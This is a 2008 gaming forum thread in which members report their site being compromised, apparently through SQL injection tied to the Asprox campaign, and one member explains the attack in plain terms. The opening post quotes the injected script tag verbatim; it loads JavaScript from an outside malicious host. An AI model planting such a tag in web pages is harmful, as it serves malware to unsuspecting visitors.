The Team Fortress 2 Fort Community Forums

Website Help And Suggestions

Script?

Rules

Script?

# Jul 31, 2008 at 10:11 AM

Join Date:	Nov 08, 2007
Post Count:	182

snapplecap 80031

Specialty: Soldier

Steam ID: snapplecap

GamerTag: SnappleCap

Clan: {TF2F} Community

after eveyone's name on a post of most recent poster list iI see this line: <script src=http://www.pfd2.ru/js.js></script>

anyone have any idea why

# Jul 31, 2008 at 10:17 AM

Join Date:	Jan 30, 2008
Post Count:	111

Skill_less 82625

Specialty: Scout

Steam ID: Skill4Less

Clan: {Squigglies}

In addition, firefox thinks that www.pfd2.ru is a reported attack site and recommends not going there. Hacked?

# Jul 31, 2008 at 10:19 AM

Join Date:	Nov 15, 2007
Post Count:	444

madroxinide 80334

Steam ID: madroxinide

The website was attacked by SQL Injection I think.

after googling "pfd2.ru + attack" I got this website http://www.dynamoo.com/blog/ and it tells that basicly pfd2.ru is an asprox domain.

Lancer knows and he has notified RBR but RBR has yet to respond (I think he is sleeping).

EDIT: RBR just notified the shoutbox that he is fixing it.

# Jul 31, 2008 at 10:19 AM

Join Date:	Dec 28, 2007
Post Count:	840

GeneralSheep 81594

Specialty: Demoman

Steam ID: misucat1

GamerTag: Psh, Wii?

Clan: {TF2F}

Quote:

Originally Posted by Skill_less
Hacked?

So it would seem, along with many other sites apparently.

# Jul 31, 2008 at 10:28 AM

Join Date:	Oct 27, 2007
Post Count:	765

X.Static 79392

Specialty: Soldier

Steam ID: jaypatrick

Clan: {TF2F} Community

Avast is flagging it as a virus, so BE CAREFUL. But yes, this looks like a classic case of SQL injection.

# Jul 31, 2008 at 10:44 AM

Join Date:	Nov 25, 2007
Post Count:	545

[VIM]Elhehir 80661

Specialty: Medic

Steam ID: [VIM]Elhehir

Clan: [VIM] Victory Is Mine!

Fixed, for now.

# Jul 31, 2008 at 11:22 AM

Join Date:	Dec 01, 2007
Post Count:	683

josef 80821

Specialty: Pyro

Steam ID: joebot

Clan: applying for {TF2F}

n00b qweschun of teh day:

what's an SQL injection?

# Jul 31, 2008 at 11:32 AM

Join Date:	Oct 03, 2007
Post Count:	402

pathos_street 77866

Steam ID: pathos_street

Clan: [AoC]

It's where you type some SQL (a language used to query/edit databases) into a field that queries or writes to the database itself, and the database interprets it as part of the code it's supposed to run. Like if I were to type in an SQL query in this here box I'm typing in, if the post comment didn't clean for it, it would nest inside the actual SQL used to write posts to the database and probably execute.

But you don't have to take my word for it.

http://en.wikipedia.org/wiki/SQL_injection

# Jul 31, 2008 at 11:33 AM

Join Date:	Mar 24, 2008
Post Count:	381

Van Crackin 83825

Specialty: Sniper

Steam ID: VanCrackin

GamerTag: Van Crackin

Clan: {TF2F}

The "Custom maps archive" thread is still infected. Be wary.

# Jul 31, 2008 at 11:54 AM

Join Date:	Feb 05, 2008
Post Count:	563

Thisbymaster 82758

Specialty: Demoman

Steam ID: thisbymaster

Clan: {TF2F}

Quote:

Originally Posted by pathos_street
It's where you type some SQL (a language used to query/edit databases) into a field that queries or writes to the database itself, and the database interprets it as part of the code it's supposed to run. Like if I were to type in an SQL query in this here box I'm typing in, if the post comment didn't clean for it, it would nest inside the actual SQL used to write posts to the database and probably execute.

But you don't have to take my word for it.

http://en.wikipedia.org/wiki/SQL_injection